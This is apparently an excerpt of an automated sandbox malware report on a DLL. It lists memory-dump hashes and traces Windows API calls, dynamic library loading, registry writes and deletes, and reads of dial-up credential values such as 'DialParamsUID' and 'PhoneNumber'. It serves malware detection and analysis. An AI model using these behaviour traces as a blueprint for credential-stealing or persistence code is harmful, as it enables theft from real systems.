                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e36b668c6f7f275d4e3c1909ff9ce4881944ec2a47434caefc73e7e0d96a4ec0
                                                  • Instruction ID: 721eaa63ce6458851d8aa1b9dc4c03e48d6a588ee79b546b769e2eb3cd3e4e7c
                                                  • Opcode Fuzzy Hash: e36b668c6f7f275d4e3c1909ff9ce4881944ec2a47434caefc73e7e0d96a4ec0
                                                  • Instruction Fuzzy Hash: 56C13E3560D3828FC308CF69C49055AFBE2BFCA208F49D97DE9D98B312D671A919CB45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 380346d83fdc543ebc22177e3de29bc30f0f136880a3c99924b68710931819b8
                                                  • Instruction ID: ac40b97b19cf350deb4381199cebd45df556241ac8ef125ecfdd14d8ce777ac4
                                                  • Opcode Fuzzy Hash: 380346d83fdc543ebc22177e3de29bc30f0f136880a3c99924b68710931819b8
                                                  • Instruction Fuzzy Hash: 3CA1B334A087968FC709CF29848031ABBE2FFD9616F24C66DD8A58F299E771C905C781
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5ba32ef62104ad4fa989df10cd095480fe71a6d544f4596f173a80f44f9302ff
                                                  • Instruction ID: 5f98526eac24df5b1521ed8c3c60a8dea648e96a9abcffbfabeff445296a397c
                                                  • Opcode Fuzzy Hash: 5ba32ef62104ad4fa989df10cd095480fe71a6d544f4596f173a80f44f9302ff
                                                  • Instruction Fuzzy Hash: 4EC18BA4A2AF0596D7168F38D482536B3A1FFF17147A4C74AD8C6B715EFB20E4A1D280
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 87cd360eeabfb3d2a53af9d4dc92188b2830e60fc760d83bb67fb1035d8072f3
                                                  • Instruction ID: 8d182b711f86b2590d44b9e897d1d1c98bcbef0953a52f6730e8bedf5447d214
                                                  • Opcode Fuzzy Hash: 87cd360eeabfb3d2a53af9d4dc92188b2830e60fc760d83bb67fb1035d8072f3
                                                  • Instruction Fuzzy Hash: F6916D32604B428FD729CF29C8914ABB7E2EF86344B69892DD5D787B11E731B849CB41
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dca000b2f6927503bda9435cdfa2d38ec8c2434b44ad82a88198043659fe7c76
                                                  • Instruction ID: e70820d266a8dfc3c891c9c4e497ac63b67ceedcd589d3e7af91b45e671c8c89
                                                  • Opcode Fuzzy Hash: dca000b2f6927503bda9435cdfa2d38ec8c2434b44ad82a88198043659fe7c76
                                                  • Instruction Fuzzy Hash: FB718533755A8207E71CCE3E8C612BAABD38FC621432ED87E94DAC7756EC79D41A5204
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4372b35affc09057055e95eac27f85d6acc192ec2d7fbe40f9cf4fbe7b4806bf
                                                  • Instruction ID: 33c87526e0ac5df6e8d31478a3e5a7e5f8d45b54e2d26c9fac9deafae02a1674
                                                  • Opcode Fuzzy Hash: 4372b35affc09057055e95eac27f85d6acc192ec2d7fbe40f9cf4fbe7b4806bf
                                                  • Instruction Fuzzy Hash: C99139756047059FD758CF68C881BABB7EAEBC8300F55992EF99AC7340DA30F9098B51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b76e08d2d6672b3b33c520d2e12ce19a17f29bb9ba19389a5687e96f1fd57d0
                                                  • Instruction ID: ecc14dccd0de40da1c0b72de8c8f5b460a412cd666a7df4e22e24f1585f85c59
                                                  • Opcode Fuzzy Hash: 3b76e08d2d6672b3b33c520d2e12ce19a17f29bb9ba19389a5687e96f1fd57d0
                                                  • Instruction Fuzzy Hash: 7E914A716093818FC318CF6DC89056AFBE2FFCE304F19863EE589C7365DA7599068A46
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 361d593a6597ca170d4028ccc48b8ee29c1db73e1bb6d68cc95f9e1a891fcec8
                                                  • Instruction ID: 394e96dab5a0ad22cad07a8418f847d0fe22322e10ef68398779eb1422000efd
                                                  • Opcode Fuzzy Hash: 361d593a6597ca170d4028ccc48b8ee29c1db73e1bb6d68cc95f9e1a891fcec8
                                                  • Instruction Fuzzy Hash: 4E81BF327195A64BE708CF29DCE053BB7A3EB8D340F19883DC686D7356C931A91AC760
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 763eac6b6b42709351b1268c3bfac75d101506b380c3a22d1c78b889bc5400ed
                                                  • Instruction ID: 4e5fd15620c05232e311bf08b0a4888acbdfcfc8b05760d64ecdd7d941a19f93
                                                  • Opcode Fuzzy Hash: 763eac6b6b42709351b1268c3bfac75d101506b380c3a22d1c78b889bc5400ed
                                                  • Instruction Fuzzy Hash: 67219373BF4E1B0EE344A9FCDC4A7A135C1D3A4715F198E38A119C72C0F5ACCA885250

                                                  Control-flow Graph

                                                  APIs
                                                  • atoi.MSVCRT(?), ref: 10025E9A
                                                    • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCrkat,?,00000000,0000002E,00000001), ref: 10014D10
                                                    • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D19
                                                    • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA), ref: 10014D27
                                                    • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D2A
                                                    • Part of subcall function 10014CA0: RegSetValueExA.ADVAPI32(00000000,?,00000000,0000004D,ExA,0000004D), ref: 10014DD4
                                                    • Part of subcall function 10014CA0: RegSetValueExA.ADVAPI32(00000000,?,00000000,0000004D,?), ref: 10014DFE
                                                    • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                    • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                    • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                    • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                  • atoi.MSVCRT(?,80000002,?,?,00000004,?,00000000,00000000,00000000), ref: 10026908
                                                    • Part of subcall function 10014CA0: RegDeleteKeyA.ADVAPI32(?,?), ref: 10014E2A
                                                  • Sleep.KERNEL32(000005DC), ref: 10026933
                                                    • Part of subcall function 10014CA0: RegDeleteValueA.ADVAPI32(?,?), ref: 10014E56
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcValue$#823Deleteatoi$Sleep
                                                  • String ID: $ $ $ $ $ $-$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$E$E$E$E$E$E$M$M$M$M$M$M$N$P$P$P$R$R$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$W$W$Y$Y$Y$Y$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$a$a$a$a$a$a$a$b$c$c$c$c$d$d$d$d$f$i$i$i$i$i$i$i$i$i$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$s$s$s$s$u$u$u$u$u$v$v$v$v$v$v$w$y
                                                  • API String ID: 3245547908-431623420
                                                  • Opcode ID: 6ddffa8ede800b22b0c7d31f1a98932fe5aee7fc99250002329de52fbb2c0142
                                                  • Instruction ID: 46da3d8f85b41806bff36dc6f8e690e7e2fa6d6d5cef91b77a25e2a54a4f965e
                                                  • Opcode Fuzzy Hash: 6ddffa8ede800b22b0c7d31f1a98932fe5aee7fc99250002329de52fbb2c0142
                                                  • Instruction Fuzzy Hash: 70524C2154D7C0DDE332C6689859BDBBED21BB3709F48489D92DC1B283C2BA4658C77B

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,755683C0,1001F1D6), ref: 1001B666
                                                    • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                    • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                  • LoadLibraryA.KERNEL32 ref: 1001BA99
                                                  • GetProcAddress.KERNEL32 ref: 1001BB65
                                                  • GetProcAddress.KERNEL32 ref: 1001BDDC
                                                  • GetCurrentProcess.KERNEL32 ref: 1001BE73
                                                  • Sleep.KERNEL32(00000014), ref: 1001BEC5
                                                  • Sleep.KERNEL32(000003E8), ref: 1001BF4C
                                                  • CloseHandle.KERNEL32(?), ref: 1001BF9F
                                                  • CloseHandle.KERNEL32(?), ref: 1001BFBC
                                                  • CloseHandle.KERNEL32(?), ref: 1001BFC7
                                                  • CloseHandle.KERNEL32(?), ref: 1001BFD5
                                                  • FreeLibrary.KERNEL32(00000000), ref: 1001BFDC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Handle$Close$AddressLibraryProc$LoadSleep$CurrentFreeModuleProcess
                                                  • String ID: .$.$.$2$2$2$3$3$3$A$A$A$A$A$A$B$B$C$C$D$D$D$D$E$E$E$E$E$E$G$I$I$I$K$L$N$N$O$P$P$P$P$Q$R$R$S$S$S$S$S$T$T$T$T$T$T$U$U$U$V$V$W$W$W$a$a$c$c$c$c$c$c$d$d$d$d$i$i$i$i$i$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$m$m$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$u$u$v$v$v$y$y$Wu
                                                  • API String ID: 2138834447-2229744375
                                                  • Opcode ID: f15b7bee6f70a8915ee534ee84d9129125d9998a3f769a34adf956414c1509a3
                                                  • Instruction ID: 3dd6ad3259126324f291c8afb837e27c16c2f5da1d1aeee9b9a4171c9f5da499
                                                  • Opcode Fuzzy Hash: f15b7bee6f70a8915ee534ee84d9129125d9998a3f769a34adf956414c1509a3
                                                  • Instruction Fuzzy Hash: 5232A06040C7C4C9E332C7688848BDBBFD66BA6748F08499DE2CC4B292C7BA5558C777
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 10005D3C
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005D45
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,GetPrivateProfileSectionNamesA), ref: 10005D55
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005D58
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,GetPrivateProfileStringA), ref: 10005D6B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005D6E
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,GetWindowsDirectoryA), ref: 10005D81
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005D84
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 10005D94
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005D97
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA), ref: 10005DA7
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005DAA
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 10005DBD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005DC0
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcmpA), ref: 10005DD3
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005DD6
                                                  • strchr.MSVCRT ref: 100060F0
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 10006131
                                                  • wsprintfA.USER32 ref: 10006151
                                                  • #823.MFC42(00001000), ref: 100061B3
                                                  • #825.MFC42(?,?,?,00000000,?,?,00000000,?,?), ref: 1000638B
                                                  • #825.MFC42(00000000,?,?,?,00000000,?,?,00000000,?,?), ref: 10006391
                                                  • #825.MFC42(00000000,00000000,?,?,?,00000000,?,?,00000000,?,?), ref: 10006397
                                                  • #825.MFC42(00000000), ref: 100063DD
                                                    • Part of subcall function 10005A50: LoadLibraryA.KERNEL32 ref: 10005AA7
                                                    • Part of subcall function 10005A50: GetProcAddress.KERNEL32(00000000), ref: 10005AAE
                                                    • Part of subcall function 10005A50: wsprintfA.USER32 ref: 10005B17
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$#825$wsprintf$#823FolderPathSpecialstrchr
                                                  • String ID: $ $ $%s\%s$.$.$C$C$D$D$Device$DialParamsUID$GetPrivateProfileSectionNamesA$GetPrivateProfileStringA$GetVersionExA$GetWindowsDirectoryA$KERNEL32.dll$M$M$N$N$PhoneNumber$S$a$a$a$a$a$a$b$b$b$b$c$c$c$c$c$c$d$e$e$e$e$e$e$e$e$f$f$g$h$h$i$i$i$i$i$i$k$k$k$k$k$k$kernel32.dll$lstrcatA$lstrcmpA$lstrcpyA$lstrlenA$m$p$p$p$p$p$p$r$r$r$r$r$r$s$s$s$s$s$s$s$s$u$w$w
                                                  • API String ID: 2391671045-4160613188
                                                  • Opcode ID: eca479f0cba930ca087138913895d5de84e08072406ba3e1e92d2a47810035d3
                                                  • Instruction ID: ae3809650b471314dde33fff758c838472e2731737b5b0f95b3dee6920cb3e1a
                                                  • Opcode Fuzzy Hash: eca479f0cba930ca087138913895d5de84e08072406ba3e1e92d2a47810035d3
                                                  • Instruction Fuzzy Hash: 77120A6150D3C4DEE322CB788848B9BBFD5AFE6748F08494DE1C847292C6BA9548C777
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 10005461
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000546A
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,GetPrivateProfileSectionNamesA), ref: 10005478
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000547B
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,GetWindowsDirectoryA), ref: 1000548E
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005491
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA), ref: 100054A1
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100054A4
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 100054B7
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100054BA
                                                  • strchr.MSVCRT ref: 100057B9
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 100057F6
                                                  • wsprintfA.USER32 ref: 10005816
                                                  • #823.MFC42(00001000), ref: 1000583D
                                                  • #825.MFC42(00000000), ref: 1000589B
                                                  Strings
                                                  Memory Dump Source
